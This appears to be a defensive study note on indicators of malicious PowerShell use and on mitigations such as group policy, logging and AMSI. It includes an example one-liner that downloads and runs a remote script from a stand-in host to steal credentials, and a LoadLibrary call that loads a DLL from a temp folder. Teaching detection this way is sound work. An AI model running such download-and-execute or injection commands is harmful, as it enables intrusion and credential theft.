# POWERSHELL MALICIOUS INDICATORS

#### POWERSHELL MALICIOUS INDICATORS

There are numerous exploit frameworks to leverage PowerShell functionality, such as PowerShell Empire, PowerSploit, Metasploit, and Mimikatz. Some suspicious indicators for PowerShell execution include the following:

  
-   Cmdlets such as Invoke-Expression, Invoke-Command, Invoke-WMIMethod, New-Service, Create-Thread, Start-Process, and New-Object can indicate an attempt to run some type of binary shellcode. This is particularly suspicious if combined with a DownloadString or DownloadFile argument. One complication is that cmdlets can be shortened, assisting obfuscation. For example, Invoke-Expression can be run using IEX.
  

```Powershell
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://badsite.foo/DoEvil.ps1'); Do-Evil -StealCreds"
``` 

-   Bypassing execution policy can also act as an indicator. The PowerShell code may be called as a Base64 encoded string (-enc argument) or may use the -noprofile or -ExecutionPolicy bypass arguments.

  

-   Using system calls to the Windows API might indicate an attempt to inject a DLL or perform process hollowing, where the malicious code takes over a legitimate process:
    
    ```Powershell
	[Kernel32]::LoadLibrary("C:\Users\Foo\AppData\Local\Temp\doevil.dll")</li><br>
	``` 
    
-   Using another type of script to execute the PowerShell is also suspicious. For example, the attacker might use JavaScript code embedded in a PDF to launch PowerShell via a vulnerable reader app.

  

The big problem with PowerShell indicators is distinguishing them from legitimate behavior. The following techniques can be used to assist with this:

  
-   Use group policy to restrict execution of PowerShell to trusted accounts and hosts.
  
-   Use group policy execution control to run scripts only from trusted locations.
  
-   Consider use of Constrained Language Mode(devblogs.microsoft.com/powershell/powershell-constrained-language-mode) and signed scripts to limit the ability of exploit code to run on high-value target systems.
-   Use PowerShell logging (docs.microsoft.com/en-us/powershell/scripting/windows-powershell/wmf/whats-new/script-logging?view=powershell-7) and the Antimalware Scan Interface (docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps) to detect and prevent obfuscated and suspicious code.
  
-   Prevent the use of old PowerShell versions to mitigate the use of a downgrade attack to bypass access controls.

> _Symantec's white paper contains a useful introduction to PowerShell exploits (docs.broadcom.com/doc/increased-use-of-powershell-in-attacks-16-en)._